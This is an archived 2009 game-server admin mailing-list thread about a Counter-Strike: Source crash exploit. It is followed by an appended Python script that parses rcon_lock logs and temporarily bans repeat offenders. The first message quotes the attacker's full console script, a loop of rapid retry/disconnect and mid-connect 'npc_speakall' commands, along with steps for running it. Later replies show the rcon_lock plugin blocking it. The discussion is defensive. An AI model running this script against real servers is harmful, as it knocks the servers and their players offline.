Also, just to clarify one of your earlier points: "I have Rcon Lock installed, this attack still works as it's not calling any commands rather than just calling retry in 0.01second intervals."
It's not the constant rejoining that is causing the crash, it's the mid-connect use of npc_speakall. That's something rcon_lock blocks.

On Sun, Aug 23, 2009 at 4:33 AM, P. Bhandal <[email protected]> wrote:

> Somebody actually just tried this on my server in the last 10 minutes, and
> rcon lock definitely blocked it:
>
> L 08/23/2009 - 04:21:59: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
> L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 71.137.230.203:
>
> I tried it on my own test server after as well, and "rcon lock" blocked it
> there as well.
>
> On Sun, Aug 23, 2009 at 4:18 AM, Kyle Sanderson <[email protected]> wrote:
>
>> Sorry for the double mail,
>> Here is a youtube video that I found showing off this exploit.
>> http://www.youtube.com/watch?v=8ScKSfsd3TU
>>
>> Kyle.
>>
>> On Sun, Aug 23, 2009 at 3:46 AM, Kyle Sanderson <[email protected]> wrote:
>>
>> > I have Rcon Lock installed, this attack still works as it's not calling any
>> > commands rather than just calling retry in 0.01second intervals. I was just
>> > thinking about a plugin/script that would ban someone's IP for 5 minutes
>> > after a person connects 2 times in 5 seconds?
>> >
>> > I don't know if that's even possible,
>> > Kyle.
>> >
>> > On Sun, Aug 23, 2009 at 2:18 AM, P. Bhandal <[email protected]> wrote:
>> >
>> >> I'm not at home, so I can't test it right now, but I believe DeviceNull's
>> >> rcon lock plugin blocks clients from sending commands before they are fully
>> >> connected. You can find more details on it here:
>> >>
>> >> http://forums.alliedmods.net/showthread.php?p=841590
>> >>
>> >> On Sun, Aug 23, 2009 at 2:01 AM, Kyle Sanderson <[email protected]> wrote:
>> >>
>> >> > Not sure how many of you have encountered this script. But it has been
>> >> > taking my server down quite a bit lately. Just found the kid on FPSB
>> >> > posting his script up so here we are.
>> >> >
>> >> > Hey guys im releasing my Green Null Name Exploit
>> >> > (BTW SAVE THIS AS A text file)
>> >> >
>> >> > 1) now u have a .txt file u make a folder in ur c strike called testscripts
>> >> > 2) open the .txt and edit it to make anything you want the symbols in there
>> >> > between letters make the color of your name change so keep those in there
>> >> > 3) put the script in your testscripts folder
>> >> > 4) open counter strike and now join a server and put this in console
>> >> > Test_StartScript crash.txt
>> >> > only leave it as crash.txt if u dont change the name of your file.
>> >> >
>> >> > Setinfo name " CaM FuCkEd Up ThE SeRvEr... "
>> >> > retry
>> >> > Test_Wait .75
>> >> > disconnect
>> >> > Test_Wait .2
>> >> > setinfo name " CaM FuCkEd Up ThE SeRvEr... "
>> >> > Test_Wait .1
>> >> > retry
>> >> > Test_Wait .75
>> >> > disconnect
>> >> > Test_Wait .2
>> >> > setinfo name " CaM FuCkEd Up ThE SeRvEr... "
>> >> > Test_Wait .1
>> >> > retry
>> >> > Test_Wait .75
>> >> > disconnect
>> >> > Test_Wait .1
>> >> > setinfo name " C a m W i n s "
>> >> >
>> >> > Test_StartLoop spamcrash
>> >> > retry
>> >> > Test_Wait 0.01
>> >> > disconnect
>> >> > Test_Wait 0.01
>> >> > Test_LoopForNumSeconds spamcrash 1
>> >> >
>> >> > Test_Wait .1
>> >> > retry;
>> >> >
>> >> > Test_StartLoop crash
>> >> > npc_speakall
>> >> > Test_Wait 0.01
>> >> > Test_LoopForNumSeconds crash 2
>> >> > disconnect;
>> >> >
>> >> > http://www.fpsbanana.com/scripts/5196
>> >> >
>> >> > Anyways, hope this helps some of you and maybe a script/patch can be made
>> >> > via sourcemod. I've already blocked the string npc_speakall via iptables but
>> >> > that had no effect (Not even sure if that calls any functions on the
>> >> > server.) I'm running CentOS 32bit and a bunch of CS:S servers.
>> >> > Kyle.
>> >> > _______________________________________________
>> >> > To unsubscribe, edit your list preferences, or view the list archives,
>> >> > please visit:
>> >> > http://list.valvesoftware.com/mailman/listinfo/hlds


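Added example, not part of the original thread and not rcon_lock's own code: the "ban an IP for 5 minutes after 2 hits in 5 seconds" idea raised in the thread, applied to the rcon_lock log line format quoted above. It assumes each log entry is on one line (the mail wrapped them); find_bans and its thresholds are hypothetical names, and enforcing the ban (firewall rule or SourceMod ban) is left to the operator.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Log line shape taken from the rcon_lock output quoted in the thread,
# with the mail client's line wrap joined back together (assumption).
LINE_RE = re.compile(
    r"^L (\d{2}/\d{2}/\d{4}) - (\d{2}:\d{2}:\d{2}): \[rcon_lock\.smx\] "
    r"Got half-connected command from client (\d{1,3}(?:\.\d{1,3}){3}):"
)

def find_bans(lines, max_events=2, window_s=5, ban_s=300):
    """Return [(ip, ban_start, ban_end)] for IPs hitting max_events in window_s."""
    recent = defaultdict(deque)   # ip -> timestamps still inside the window
    banned_until = {}             # ip -> expiry of the current ban
    bans = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue              # unrelated or malformed log line
        ts = datetime.strptime(m.group(1) + " " + m.group(2), "%m/%d/%Y %H:%M:%S")
        ip = m.group(3)
        if ip in banned_until and ts < banned_until[ip]:
            continue              # already banned: do not stack bans
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:
            q.popleft()           # drop events older than the window
        if len(q) >= max_events:
            end = ts + timedelta(seconds=ban_s)
            banned_until[ip] = end
            bans.append((ip, ts, end))
            q.clear()             # start counting afresh after the ban
    return bans

# Constructed sample lines using documentation addresses, not the thread's log.
SAMPLE = """\
L 08/23/2009 - 04:21:59: [rcon_lock.smx] Got half-connected command from client 192.0.2.10:
L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 192.0.2.10:
L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from client 192.0.2.10:
L 08/23/2009 - 04:22:03: [rcon_lock.smx] Got half-connected command from client 198.51.100.7:
L 08/23/2009 - 04:25:40: [rcon_lock.smx] Got half-connected command from client 198.51.100.7:
L 08/23/2009 - 04:27:30: [rcon_lock.smx] Got half-connected command from client 192.0.2.10:
L 08/23/2009 - 04:27:31: [rcon_lock.smx] Got half-connected command from client 192.0.2.10:
""".splitlines()

if __name__ == "__main__":
    for ip, start, end in find_bans(SAMPLE):
        print(f"{ip}: ban {start:%H:%M:%S} -> {end:%H:%M:%S}")
```

The second address in the sample logs two events more than five seconds apart and is not banned; the first is banned once, ignored while the ban lasts, and banned again when it returns after expiry.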